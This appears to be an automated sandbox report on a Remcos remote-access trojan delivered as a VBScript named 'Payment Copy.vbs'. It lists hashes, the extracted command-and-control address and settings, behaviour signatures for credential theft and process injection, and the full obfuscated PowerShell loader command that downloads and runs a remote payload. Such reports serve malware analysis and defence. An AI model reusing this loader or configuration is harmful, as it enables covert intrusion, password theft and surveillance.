remcos | 7469a174199a6068c3534b0698c75ebf754e92408f0607eb00cf9d3ea86e2b11

Analysis

max time kernel
148s
max time network
154s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
01-07-2024 09:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Copy.vbs
Size

22KB
MD5

98016b4c57fc38530cc0586ed0782b09
SHA1

db01e9695d8eb3f91692530890978877d679bdc9
SHA256

7469a174199a6068c3534b0698c75ebf754e92408f0607eb00cf9d3ea86e2b11
SHA512

d3f129c2924e755bae7669f4fb9c36bfabe245e8f307ccf3346794e2ca6b911e6772a3a25215daa4d7a6658c200e0fe07b3ca701652d0546c68b5ce4780ef935
SSDEEP

384:TreTG9A2Mu5ELeeAu7ykTvUKS3u7091jpq0W/c3345sb4WB6eTG7Ol/:Xe0L5U/gkT5Pyjs0WYH4WPpl/

Score

10^/10

remcos remotehost collection rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

103.237.87.40:1993

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-Y1ZTA5
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral1/memory/1612-52-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral1/memory/1100-53-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

resource	yara_rule
behavioral1/memory/1612-52-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral1/memory/1100-53-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1472-57-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1100-53-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/1612-52-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

3 1304 WScript.exe
6 2616 powershell.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

888 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1040 powershell.exe
888 wab.exe

flow	pid	process
3	1304	WScript.exe
6	2616	powershell.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

pid	process
888	wab.exe

pid	process
1040	powershell.exe
888	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 1040 set thread context of 888	1040	powershell.exe	wab.exe
PID 888 set thread context of 1100	888	wab.exe	wab.exe
PID 888 set thread context of 1612	888	wab.exe	wab.exe
PID 888 set thread context of 1472	888	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

2616 powershell.exe
1040 powershell.exe
1040 powershell.exe
1100 wab.exe
1100 wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exewab.exe

pid process

1040 powershell.exe
888 wab.exe
888 wab.exe
888 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 2616 powershell.exe
Token: SeDebugPrivilege 1040 powershell.exe
Token: SeDebugPrivilege 1472 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

888 wab.exe

pid	process
2616	powershell.exe
1040	powershell.exe
1040	powershell.exe
1100	wab.exe
1100	wab.exe

pid	process
1040	powershell.exe
888	wab.exe
888	wab.exe
888	wab.exe

description	pid	process
Token: SeDebugPrivilege	2616	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1472	wab.exe

pid	process
888	wab.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.exe

description	pid	process	target process
PID 1304 wrote to memory of 2616	1304	WScript.exe	powershell.exe
PID 1304 wrote to memory of 2616	1304	WScript.exe	powershell.exe
PID 1304 wrote to memory of 2616	1304	WScript.exe	powershell.exe
PID 2616 wrote to memory of 2808	2616	powershell.exe	cmd.exe
PID 2616 wrote to memory of 2808	2616	powershell.exe	cmd.exe
PID 2616 wrote to memory of 2808	2616	powershell.exe	cmd.exe
PID 2616 wrote to memory of 1040	2616	powershell.exe	powershell.exe
PID 2616 wrote to memory of 1040	2616	powershell.exe	powershell.exe
PID 2616 wrote to memory of 1040	2616	powershell.exe	powershell.exe
PID 2616 wrote to memory of 1040	2616	powershell.exe	powershell.exe
PID 1040 wrote to memory of 348	1040	powershell.exe	cmd.exe
PID 1040 wrote to memory of 348	1040	powershell.exe	cmd.exe
PID 1040 wrote to memory of 348	1040	powershell.exe	cmd.exe
PID 1040 wrote to memory of 348	1040	powershell.exe	cmd.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 1040 wrote to memory of 888	1040	powershell.exe	wab.exe
PID 888 wrote to memory of 1100	888	wab.exe	wab.exe
PID 888 wrote to memory of 1100	888	wab.exe	wab.exe
PID 888 wrote to memory of 1100	888	wab.exe	wab.exe
PID 888 wrote to memory of 1100	888	wab.exe	wab.exe
PID 888 wrote to memory of 1100	888	wab.exe	wab.exe
PID 888 wrote to memory of 1612	888	wab.exe	wab.exe
PID 888 wrote to memory of 1612	888	wab.exe	wab.exe
PID 888 wrote to memory of 1612	888	wab.exe	wab.exe
PID 888 wrote to memory of 1612	888	wab.exe	wab.exe
PID 888 wrote to memory of 1612	888	wab.exe	wab.exe
PID 888 wrote to memory of 1472	888	wab.exe	wab.exe
PID 888 wrote to memory of 1472	888	wab.exe	wab.exe
PID 888 wrote to memory of 1472	888	wab.exe	wab.exe
PID 888 wrote to memory of 1472	888	wab.exe	wab.exe
PID 888 wrote to memory of 1472	888	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment Copy.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds';If (${host}.CurrentCulture) {$Golf++;}Function Hosernes($Vulpecular){$systemadministratorens=$Vulpecular.Length-$Golf;$Equiaxed='SUBsTRI';$Equiaxed+='ng';For( $Ringmuren=7;$Ringmuren -lt $systemadministratorens;$Ringmuren+=8){$Indmurer+=$Vulpecular.$Equiaxed.Invoke( $Ringmuren, $Golf);}$Indmurer;}function Hjttaleranlggenes($Amalgamering){ & ($Underkanterne) ($Amalgamering);}$Musikledsagelsen=Hosernes 'FaksimiM Melanco Usmmelz rappori ChemialmarsupilBy,gesaa Frafly/Mat tin5invalid.Udposen0Tomahaw Tidsbi(Cr ceinWUnv,porispousaln RuflendIndenrioEkspediwNaermessObje ti Begr,dgNVoc,tioTAddebt. Ia.ttag1Lysthus0femhund.Wakiupt0antimon;sharecr P,omulgWVanrgtei Roeg,lnTumoral6 Gummis4Balerfa;Unspoke HandigaxAmtsgym6Vaskens4Bundlse;Hjemkal Thora,kr SalgsvvE.benpe:Prsentx1Pendult2pewtere1 manife.Postbru0 Smit,l)Agrac j MedullaGForsdedeMonosercB,ndevikHermelioLydkort/Stileh 2 Ven,re0Degnoti1Opht,al0Blideli0angelic1 rbejde0 Bottic1Valkyri RumaflyFSeponericentralrKildespeTitanolf espekto SepoysxRebric,/Tyndst,1Informa2pro,ary1 nderbo. snepp.0Bikager ';$Serologer=Hosernes 'Dis,preU Aman ss,anchmaeKnived rGr enhi- ClathrAKildeskgImperiee LufthunUpholdstSidelin ';$skriftsted=Hosernes 'NskebenhRecipietOwlg,astOffend,pRetfae : B.ndli/Numidia/Smocksy1Platema0Polaran3 arong.Compute2Edgrewd3arbejds7 Vrd,br.Subageu8Feoffee6Pedetic.Forflad2Headbox4,rgusje7Informa/ b,lemrCExtrapeaHinma nr Datas pDurndeseconfirmtUngodlym.amponeaSuperexkCon,radi.strocynI,troprg Solenn.B,radiapPhonaticInterxyxubesind ';$Kilogrammets=Hosernes 'Bag,ave> Re,ntr ';$Underkanterne=Hosernes 'My holoiforvarmeD,ddiecxunderco ';$Fyrreaarsfdselsdagen='Codling';$Recipientkvalitetsinteresses = Hosernes 'CrabfiseS eltevcGewgawshaggraveo,oncede Unsnib%Forci,la evelopp,imidiapPlesio dTerrorraTilri.ntTimelofaScalple%Ve ning\SpringvRPurismee Triakit Disce s Ne.priv Eft,rmiEthnogrdRe ulfunLejemore Klfte rPhanicms.ammert. unreprFUdr,nsnoMalbethrgulping Brledes&Trevang& Nynor Spr,ngee Enaa,icFlittinh TevarmoPetalif Id ldytFremmar ';Hjttaleranlggenes (Hosernes 'Kravlen$Resoje,gUeue eolScatlanosm,sherb OlivenaD ikkenlCheatin:Mikrofos Ud indlPinstrivLic enia agotoml NostaldDisnew eG.rshwirCleavine Raadfrn Rettig=Knappen(Plyndric.emicubm Ter.cad Logikk iskon/Overta cRotter. Muktatm$Hjer,esRDavidiceHeallescdelig tiUdflugtpViklingi Lereg eK.ydshenS.arntytFlogmaskDenuncivVedf,era verneulCylin,riBarkbiltAlvorsteS rabnst Hjarnss Trabeai Ha,erenDisket,tFadlsaneNadversr.paltebeJentacusMisvksts OptimieMassakrsTromped) indlaa ');Hjttaleranlggenes (Hosernes 'Steevel$MartyrigFrugthal AnalogoDefrostbmawbouna .ypocal.aritas:Ha.vensVTilbageaOm annenTachoscaGenanskdBa.lepraBeskytttLggebroeRygskkesFor.rud= Pejles$DykkesksDygtiggkUnposturphenocoiSotterffkursusltUnrede.sCh ckkotBuksekne RyperndCableca.HomesicsAdeligepLrdomsslTingermiBrrupsktHeltal.(Interva$ AdelsmKFutha ciCutinizlAl weiloUdflippg seudonrInosculaRekvisimBroderem tusindeSygehustUdlig.esLastpra) nflav ');Hjttaleranlggenes (Hosernes ' Sports[Bry mesNNordh ueoverbo,tReinves.AfbrydeS,nddrivePlastfirPhenoxiv SikriniC,ayanecOverconeSubcu.aPVe.tersoBes.ingiSeismolnhippocrtTheopatMNonemera Reformnreproara Sprog,gBrand.reJon,nsarster,be]Kerauno:Seminar:QuiteveSFlaredaeAddiealcOpsummou SecretrPhysostiFlyst rtP ghlityNonintePIndi.crr FlatwaoPrognattEbonitsoBlddelscMis isaoRush,eslHaan,gr S,rudse=Ettalle Hovedme[StencilNForkerteCamb djt Semire. ,ilvarSPyridineBrandbacRevisiouMaskinprKubis.ei IndsamtDeratisyteks ehPPolysi.rM,crobuoL.kkemetRandonkoKontordcPeri,heoOpstilllHypogloTBeret,eyAbbederpEndevaeeHenled ] Sandst:Udbrdro: Def,ayTanskuellCi kulrsFireogt1Leahdia2 Gen.pe ');$skriftsted=$Vanadates[0];$Unprelatical= (Hosernes 'Brnesag$ Devic,gVidere,lDefilero Intensb ondecaGombostl .erous:Helsi eUInvigilnscramblsOversttiVocabilmPractismPsyc aleKn.ghtlrPhysciaiInadvisngdningsg Musale=CirkulaNSporvejeForlystwJ.nkiep-DisgracOPollamsbCe ebeljFstereneNdringsc Frem atAfsende Flande,SWingedoyudkommas VigasatPopula.eKvar.sumSu,erpr.S,faneuNRedefeceE lipsot ritikk.Skiv ngWCastoroeDyrebarbSkandalCRepatrilChoroloiOrthogoe Sikkatn uricatt');$Unprelatical+=$slvalderen[1];Hjttaleranlggenes ($Unprelatical);Hjttaleranlggenes (Hosernes 'ext nsi$MiteexpUNutidsmn KamuflsliviasgiFredsbemf,ygtnimSt,pulaeChefredrSk.rlagiActinian SladregAntiper.TchervoHAntiabre,nsuffiaA.tivendH.rnioleTabetvir Ultrass.ejkant[Maraisu$CopubliSRe iteseLi etnorVerneysoPectinilPlied,aoUnbelieg DiascheCrashinrT,ssest]Mischan=intoler$ MarrieMAarendeu.aalschs .rustei PraxeskuncharmlLreproceSinapisd QuenchsTransfoa ictualg H,lvnoeBlodsnklHyd.osismidnig.ePalmatinVentage ');$Venules=Hosernes ' Spelld$SeemlieUJudis,inMaalstns HarengiRemer,imbitt rsmVowessheKonfusirStraffei .eskien HeavergGardier.SkredetDLsbareso Manegew Overlan SmaabolThirstloBookfolaE,teriedUb.vidsFDiskrepiDemibobl PoppyceNondisp(Rescrib$nettovrsG.nvejek manglerSculperiBlodansfrkenerst NoncausBaglinit MonopaeSierrandOrdensp,Forkbal$KlinikdHKuratoraSe,suallSubv.rsvP.nuelaf .versee IndoptmStningss Bst,upaHelautoa Ss gdur Kapelmi Efter g Ba,lepeInclina1Spirit,8Krimisc1Bord,yl)Wyverun ';$Halvfemsaarige181=$slvalderen[0];Hjttaleranlggenes (Hosernes ' Feriek$resumergforstralDerigenoSpulingbUnweariaunprival Bycen.: Nitr.gPUdspilea,emtesarDukk,staPrivatepU,enerthVengea,rNarkoceaJerupwasst.nrkeiRe.nskaaKlejnee=Nedrivn(SupersaT SquinteReviso.sSnusfortstue.ug-MicrocoP ByrledaUdkiksptLithodehFor,rug Postepi$SinuvenH LaudataMultipllPixilatvHalsretfIsarithe fastelm holdnes Frustraliente aUdlngslrTkni,gei SagsbegUnifor eDevoutl1Betynge8New.own1 Taftfo)Ritte.d ');while (!$Paraphrasia) {Hjttaleranlggenes (Hosernes 'Uncampa$InoffengSca prvlK ntrolo.arbarebAstero.areranp,lFlleskr:IbrugtaDBenradee Im.tatsNonpersp KoterdeVedkommkExpurgetVideobae,alaeobnTorveda=Rygelse$Splida,tTranspar HaircuuHi,hbale.hinook ') ;Hjttaleranlggenes $Venules;Hjttaleranlggenes (Hosernes 'DeodoriSundskylt UndersaUdskiftrSpiculut Reboun-AngliseSBucklerl GinglyeRingtaieBrusettpSubdrui Diarree4 litte. ');Hjttaleranlggenes (Hosernes 'Fashing$EntheosgEksamenlPupilleoRllikerbLamentaaOutbannl hagrin:KanalerP Keypada S umrer L,byriaTilbagepFlekskoh MistenrPuttenda,ervilesGennemli Archlua Slikke=Work an(KomondoT Vo.ticeEpidia.sSpectrot Foster-ruminatPBrevvekaInbreedtHuzvarehP,pnser Raasto$Katte.jHBoniteraVelaturlBenightvWehralbfEnevoldeSnorketmAliquots horkiaHussybuaPeritonrStyrtbji BalancgForvalteArbe ds1 C.ncer8Unyeane1Erlggen)Nonsana ') ;Hjttaleranlggenes (Hosernes 'Borger,$ aloneng DeputilkvldefroBufote,bMottoeraTheat,rlBarazac: Stamm,P Es,phar Komp.ia.ndeciskgeneralsMetrizaiPoultrys Dubbovn Sikkerdprecir,rHullabainervimunFam.liegcl.bbineWilinesnLyttaef1 Balsam3Oliefyr9 Progra= Fidusm$Intervig MaksimlJugeredosoftbacbEpi,cleaEle trilPedas.u:Foste.sF BetingrexistendSammensiLinjedegGtt.rierKammedeeIldragetBestikktdiscoveeResolutr .ordannSpiredyeDeliber+ Epopee+Calyptr%Glub.ke$ nahumpVp adesea Kogt,enElekt.oaMantuasd isarmaa EpiphatF yingiePanorers Sign.l.ArchplucSubtraho Supracu ireannn Skabelt Palaeo ') ;$skriftsted=$Vanadates[$Praksisndringen139];}$Opposit=316532;$bankekds=30167;Hjttaleranlggenes (Hosernes ' .rdkla$UnderlegOversetlStandaroundstnvbOari paaEmbarkulUforsta:SnorksoU OmklasvKoe.sisoMump,rirsocialcnSla ekohTrans,oeFyreseddVer ifu A,elard= Fughet vaskomGvalo,uneEpoxy.atGenerat- Disa.pCElectrooA lersin Skjoldt Skat eeSi nficnFolke,itBarthia Forldea$PinjrakHFrinumraUddatablGrv.ingv igeretfPr.image U.pindmTeorichsBolarenaHisoveraNusser r KonseriDemocragPbelag.eSivenes1Transpa8Udblsni1Konsumf ');Hjttaleranlggenes (Hosernes ' Cornif$ Gu.umigStorgo lForfiltob,stedabNihcancaWatchhol Overfl:Kil,calMFormelli Bagwors ToldpopForankruDatidigtIndvoldtWhistleiHalvdannDuttetsgFor,etn Lynched= Turner Odontot[ SuffecSPreoccuyGvestessDi putat OevredeOvero,fm edrin.DepraveCCarneoloSpallspnFolkfotvMetalleeSatyrisr,endbartvobisga].opfolk:Bill,dh:udkonkuFsektorsrAfnatiooNonillumAdresseBMagtspia igtelss ommyereBrazils6 U.iten4 P eridS Cowf,ot pe.levrSep,imaiNondir.nKunstakg.tenogr(.ealisa$UncrumpU uperevUndergroNo.coherBruger,nP eoccuh UnisepeUrbanisdXiphosu)Beklage ');Hjttaleranlggenes (Hosernes 'Fremfus$JenaabngPassemelEllekiloB,naadobOdmarkoa Lal palLatestp:RigtigsiMic,onimRondaweb buketti DikessbAirligheSemicosrstatsejsBohem.b Opsgn.n=taberen Hyb,nkr[In dmmeSPukk,lsyVelbeslsVrdi,ovtR melige PterotmHyperki. BortelTCigarmaeRememorxGri mestSe,undy.berigelEUst.rlinSiegernc Lok,mooEnergipd Disfavi IsocyanResurregBoxbush],lwinhe:Brahman:ShoedepARisk esSVestjydC BronzeIS ivelsI.efence.TringciGStrickse Teks,etU vikliSGuaguantFa sterrOrchieciop,tninn MervfogCe.eban(Al enhe$Liga urMHen,tani Hypoc sStkningpPara.rau eft.rtt kyggestUdklknii,edsaltnGalninggAfskovn)Fiskepl ');Hjttaleranlggenes (Hosernes '.enophi$Natanieg dublerl ,iberaogymnostbRes.edlaJrgineslForeimp:DioxinsD UdslynuEmulsiofUdmn,esfVandetteIn laeslGennemscutriculoBintjeka Midd ltEmbo.tee Ove,vurUlidelin Cam,hoeBlokade=Checken$Unpla tiFrkenermm,adedibPowe,lei.ndgangbBurstine .ntrffr Bolshis Pounce.UnplashsEleva,ouPenaeagbBrochursT.ntacutEmydianrPygobraiGuar,ranKa akomg Morefo(uranome$SpaltniOfremdrapUnimpowpKulde,yoDa nebrs MiswenipeplesstAbomina,Pyrheli$ risikobInd,indasote.ionSatanisk Styr ne BrevskkLovtidedUn.uckismanip l)Gni.end ');Hjttaleranlggenes $Duffelcoaterne;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Retsvidners.For && echo t"
3⤵
PID:2808

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds Indmurer Frdigretterne Praksisndringen139 Vanadates skriftsted Deletimens Maskedes Codling Uvornhed Shoder Ungelatinized141 imbibers Reformkrfters Solvig Inwrap Vldens afbrnd cavilings Maier Addere203 Rhizocarpian Halvfemsaarige181 Rulamspelsens Enkemnds';If (${host}.CurrentCulture) {$Golf++;}Function Hosernes($Vulpecular){$systemadministratorens=$Vulpecular.Length-$Golf;$Equiaxed='SUBsTRI';$Equiaxed+='ng';For( $Ringmuren=7;$Ringmuren -lt $systemadministratorens;$Ringmuren+=8){$Indmurer+=$Vulpecular.$Equiaxed.Invoke( $Ringmuren, $Golf);}$Indmurer;}function Hjttaleranlggenes($Amalgamering){ & ($Underkanterne) ($Amalgamering);}$Musikledsagelsen=Hosernes 'FaksimiM Melanco Usmmelz rappori ChemialmarsupilBy,gesaa Frafly/Mat tin5invalid.Udposen0Tomahaw Tidsbi(Cr ceinWUnv,porispousaln RuflendIndenrioEkspediwNaermessObje ti Begr,dgNVoc,tioTAddebt. Ia.ttag1Lysthus0femhund.Wakiupt0antimon;sharecr P,omulgWVanrgtei Roeg,lnTumoral6 Gummis4Balerfa;Unspoke HandigaxAmtsgym6Vaskens4Bundlse;Hjemkal Thora,kr SalgsvvE.benpe:Prsentx1Pendult2pewtere1 manife.Postbru0 Smit,l)Agrac j MedullaGForsdedeMonosercB,ndevikHermelioLydkort/Stileh 2 Ven,re0Degnoti1Opht,al0Blideli0angelic1 rbejde0 Bottic1Valkyri RumaflyFSeponericentralrKildespeTitanolf espekto SepoysxRebric,/Tyndst,1Informa2pro,ary1 nderbo. snepp.0Bikager ';$Serologer=Hosernes 'Dis,preU Aman ss,anchmaeKnived rGr enhi- ClathrAKildeskgImperiee LufthunUpholdstSidelin ';$skriftsted=Hosernes 'NskebenhRecipietOwlg,astOffend,pRetfae : B.ndli/Numidia/Smocksy1Platema0Polaran3 arong.Compute2Edgrewd3arbejds7 Vrd,br.Subageu8Feoffee6Pedetic.Forflad2Headbox4,rgusje7Informa/ b,lemrCExtrapeaHinma nr Datas pDurndeseconfirmtUngodlym.amponeaSuperexkCon,radi.strocynI,troprg Solenn.B,radiapPhonaticInterxyxubesind ';$Kilogrammets=Hosernes 'Bag,ave> Re,ntr ';$Underkanterne=Hosernes 'My holoiforvarmeD,ddiecxunderco ';$Fyrreaarsfdselsdagen='Codling';$Recipientkvalitetsinteresses = Hosernes 'CrabfiseS eltevcGewgawshaggraveo,oncede Unsnib%Forci,la evelopp,imidiapPlesio dTerrorraTilri.ntTimelofaScalple%Ve ning\SpringvRPurismee Triakit Disce s Ne.priv Eft,rmiEthnogrdRe ulfunLejemore Klfte rPhanicms.ammert. unreprFUdr,nsnoMalbethrgulping Brledes&Trevang& Nynor Spr,ngee Enaa,icFlittinh TevarmoPetalif Id ldytFremmar ';Hjttaleranlggenes (Hosernes 'Kravlen$Resoje,gUeue eolScatlanosm,sherb OlivenaD ikkenlCheatin:Mikrofos Ud indlPinstrivLic enia agotoml NostaldDisnew eG.rshwirCleavine Raadfrn Rettig=Knappen(Plyndric.emicubm Ter.cad Logikk iskon/Overta cRotter. Muktatm$Hjer,esRDavidiceHeallescdelig tiUdflugtpViklingi Lereg eK.ydshenS.arntytFlogmaskDenuncivVedf,era verneulCylin,riBarkbiltAlvorsteS rabnst Hjarnss Trabeai Ha,erenDisket,tFadlsaneNadversr.paltebeJentacusMisvksts OptimieMassakrsTromped) indlaa ');Hjttaleranlggenes (Hosernes 'Steevel$MartyrigFrugthal AnalogoDefrostbmawbouna .ypocal.aritas:Ha.vensVTilbageaOm annenTachoscaGenanskdBa.lepraBeskytttLggebroeRygskkesFor.rud= Pejles$DykkesksDygtiggkUnposturphenocoiSotterffkursusltUnrede.sCh ckkotBuksekne RyperndCableca.HomesicsAdeligepLrdomsslTingermiBrrupsktHeltal.(Interva$ AdelsmKFutha ciCutinizlAl weiloUdflippg seudonrInosculaRekvisimBroderem tusindeSygehustUdlig.esLastpra) nflav ');Hjttaleranlggenes (Hosernes ' Sports[Bry mesNNordh ueoverbo,tReinves.AfbrydeS,nddrivePlastfirPhenoxiv SikriniC,ayanecOverconeSubcu.aPVe.tersoBes.ingiSeismolnhippocrtTheopatMNonemera Reformnreproara Sprog,gBrand.reJon,nsarster,be]Kerauno:Seminar:QuiteveSFlaredaeAddiealcOpsummou SecretrPhysostiFlyst rtP ghlityNonintePIndi.crr FlatwaoPrognattEbonitsoBlddelscMis isaoRush,eslHaan,gr S,rudse=Ettalle Hovedme[StencilNForkerteCamb djt Semire. ,ilvarSPyridineBrandbacRevisiouMaskinprKubis.ei IndsamtDeratisyteks ehPPolysi.rM,crobuoL.kkemetRandonkoKontordcPeri,heoOpstilllHypogloTBeret,eyAbbederpEndevaeeHenled ] Sandst:Udbrdro: Def,ayTanskuellCi kulrsFireogt1Leahdia2 Gen.pe ');$skriftsted=$Vanadates[0];$Unprelatical= (Hosernes 'Brnesag$ Devic,gVidere,lDefilero Intensb ondecaGombostl .erous:Helsi eUInvigilnscramblsOversttiVocabilmPractismPsyc aleKn.ghtlrPhysciaiInadvisngdningsg Musale=CirkulaNSporvejeForlystwJ.nkiep-DisgracOPollamsbCe ebeljFstereneNdringsc Frem atAfsende Flande,SWingedoyudkommas VigasatPopula.eKvar.sumSu,erpr.S,faneuNRedefeceE lipsot ritikk.Skiv ngWCastoroeDyrebarbSkandalCRepatrilChoroloiOrthogoe Sikkatn uricatt');$Unprelatical+=$slvalderen[1];Hjttaleranlggenes ($Unprelatical);Hjttaleranlggenes (Hosernes 'ext nsi$MiteexpUNutidsmn KamuflsliviasgiFredsbemf,ygtnimSt,pulaeChefredrSk.rlagiActinian SladregAntiper.TchervoHAntiabre,nsuffiaA.tivendH.rnioleTabetvir Ultrass.ejkant[Maraisu$CopubliSRe iteseLi etnorVerneysoPectinilPlied,aoUnbelieg DiascheCrashinrT,ssest]Mischan=intoler$ MarrieMAarendeu.aalschs .rustei PraxeskuncharmlLreproceSinapisd QuenchsTransfoa ictualg H,lvnoeBlodsnklHyd.osismidnig.ePalmatinVentage ');$Venules=Hosernes ' Spelld$SeemlieUJudis,inMaalstns HarengiRemer,imbitt rsmVowessheKonfusirStraffei .eskien HeavergGardier.SkredetDLsbareso Manegew Overlan SmaabolThirstloBookfolaE,teriedUb.vidsFDiskrepiDemibobl PoppyceNondisp(Rescrib$nettovrsG.nvejek manglerSculperiBlodansfrkenerst NoncausBaglinit MonopaeSierrandOrdensp,Forkbal$KlinikdHKuratoraSe,suallSubv.rsvP.nuelaf .versee IndoptmStningss Bst,upaHelautoa Ss gdur Kapelmi Efter g Ba,lepeInclina1Spirit,8Krimisc1Bord,yl)Wyverun ';$Halvfemsaarige181=$slvalderen[0];Hjttaleranlggenes (Hosernes ' Feriek$resumergforstralDerigenoSpulingbUnweariaunprival Bycen.: Nitr.gPUdspilea,emtesarDukk,staPrivatepU,enerthVengea,rNarkoceaJerupwasst.nrkeiRe.nskaaKlejnee=Nedrivn(SupersaT SquinteReviso.sSnusfortstue.ug-MicrocoP ByrledaUdkiksptLithodehFor,rug Postepi$SinuvenH LaudataMultipllPixilatvHalsretfIsarithe fastelm holdnes Frustraliente aUdlngslrTkni,gei SagsbegUnifor eDevoutl1Betynge8New.own1 Taftfo)Ritte.d ');while (!$Paraphrasia) {Hjttaleranlggenes (Hosernes 'Uncampa$InoffengSca prvlK ntrolo.arbarebAstero.areranp,lFlleskr:IbrugtaDBenradee Im.tatsNonpersp KoterdeVedkommkExpurgetVideobae,alaeobnTorveda=Rygelse$Splida,tTranspar HaircuuHi,hbale.hinook ') ;Hjttaleranlggenes $Venules;Hjttaleranlggenes (Hosernes 'DeodoriSundskylt UndersaUdskiftrSpiculut Reboun-AngliseSBucklerl GinglyeRingtaieBrusettpSubdrui Diarree4 litte. ');Hjttaleranlggenes (Hosernes 'Fashing$EntheosgEksamenlPupilleoRllikerbLamentaaOutbannl hagrin:KanalerP Keypada S umrer L,byriaTilbagepFlekskoh MistenrPuttenda,ervilesGennemli Archlua Slikke=Work an(KomondoT Vo.ticeEpidia.sSpectrot Foster-ruminatPBrevvekaInbreedtHuzvarehP,pnser Raasto$Katte.jHBoniteraVelaturlBenightvWehralbfEnevoldeSnorketmAliquots horkiaHussybuaPeritonrStyrtbji BalancgForvalteArbe ds1 C.ncer8Unyeane1Erlggen)Nonsana ') ;Hjttaleranlggenes (Hosernes 'Borger,$ aloneng DeputilkvldefroBufote,bMottoeraTheat,rlBarazac: Stamm,P Es,phar Komp.ia.ndeciskgeneralsMetrizaiPoultrys Dubbovn Sikkerdprecir,rHullabainervimunFam.liegcl.bbineWilinesnLyttaef1 Balsam3Oliefyr9 Progra= Fidusm$Intervig MaksimlJugeredosoftbacbEpi,cleaEle trilPedas.u:Foste.sF BetingrexistendSammensiLinjedegGtt.rierKammedeeIldragetBestikktdiscoveeResolutr .ordannSpiredyeDeliber+ Epopee+Calyptr%Glub.ke$ nahumpVp adesea Kogt,enElekt.oaMantuasd isarmaa EpiphatF yingiePanorers Sign.l.ArchplucSubtraho Supracu ireannn Skabelt Palaeo ') 